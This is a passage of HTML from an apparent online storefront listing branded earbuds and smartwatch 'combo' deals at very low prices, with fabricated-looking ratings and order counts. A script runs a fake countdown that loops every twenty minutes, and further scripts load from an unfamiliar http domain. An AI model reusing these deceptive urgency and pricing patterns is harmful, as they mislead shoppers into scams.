                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- ten product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/10.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">Combo Deal Smart Watch Series 6 And AirPods 2</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.7 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">154 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">BUILT-IN DUAL MICROPHONES :- With built-in microphone on both sides earbuds, allows you to make hand-free calls from either one. Provide clear and sound quality phone call</li><br>
                                                      <li class="dispro">Bluetooth 5.0, more stable and faster connection</li><br>
                                                      <li class="dispro">This pack comes with a 1 Year Replacement Warranty All Over India. Successful Warranty Claims under the policy will be covered with a replacement of a new product unit</li><br>
                                                     
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 269</h4>
                                                      <span class="text-danger"><s>Rs 699</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- eleven product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/11.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">BOSE COMBO OF 2 { BUY 1 GET 1 FREE}</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.6 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">174 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">Truly wireless sport headphones for total freedom of movement,</li><br>
                                                      <li class="dispro">packed full of technology that makes music sound clear and</li><br>
                                                      <li class="dispro">powerful and Earbuds are sweat and weather resistant (with an IPX4 rating)</li><br>
                                                      <li class="dispro">Come with 3 different pairs of stay hear + sport tips</li><br>
                                                      <li class="dispro">(in sizes S/M/L) that provide a comfortable and secure fit</li><br>
                                                      <li class="dispro">(sizes S/M/L) that provide a comfortable and secure fit</li>
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 279</h4>
                                                      <span class="text-danger"><s>Rs 369</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- twelve product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/12.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">SONY&  BOSE EARBUDS AND NECKBAND BUY 1 GET 1 FREE COMBO OFFER</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            3.5 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">454 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">One-touch listening with Bluetooth and NFC</li><br>
                                                      <li class="dispro">Up to 20 hours battery life for long listening hours, Charging Time Approx. 4.5 hrs</li><br>
                                                      <li class="dispro">9mm neodymium drivers for dynamic sound, Frequency Response 8 Hz–22,000 Hz</li><br>
                                                      <li class="dispro">Comfortable behind-the-neck style with cable management.</li><br>
                                                      <li class="dispro">Vibration for incoming call to get alert for every call</li><br>
                                                      <li class="dispro">Bluetooth Technology: Bluetooth specification version 4.2</li>
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 269</h4>
                                                      <span class="text-danger"><s>Rs 499</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>


                                 <hr />
                              </div>
                           </div>

                        </div>
                     </div>
                  </div>
               </div>

            </div>
         </div>

         <script type="text/javascript">
            setInterval(function () {
               var d = new Date();
               var seconds = d.getMinutes() * 60 + d.getSeconds(); //convet 00:00 to seconds for easier caculation
               var fiveMin = 60 * 20; //five minutes is 300 seconds!
               var timeleft = fiveMin - seconds % fiveMin; // let's say 01:30, then current seconds is 90, 90%300 = 90, then 300-90 = 210. That's the time left!
               var result = parseInt(timeleft / 60) + ':' + timeleft % 60; //formart seconds into 00:00 
               document.getElementById('test').innerHTML = result;

            }, 500) //calling it every 0.5 second to do a count down
         </script>
      </div>
      <footer class="seofooter" id="seofooter">
      </footer>
      <script defer src="http://ingvyasyadeal.website/assets/js/jquery.min.js"></script>
      <script defer src="http://ingvyasyadeal.website/assets/js/bootstrap.min.js"></script>
      <script defer src="http://ingvyasyadeal.website/assets/js/relativeTime.js"></script>
      <script defer src="http://ingvyasyadeal.website/assets/js/days.min.js"></script>
      <script defer src="http://ingvyasyadeal.website/assets/js/custom.js"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
      <script defer src="http://ingvyasyadeal.website/assets/js/manage_index.js"></script>
</body>

</html>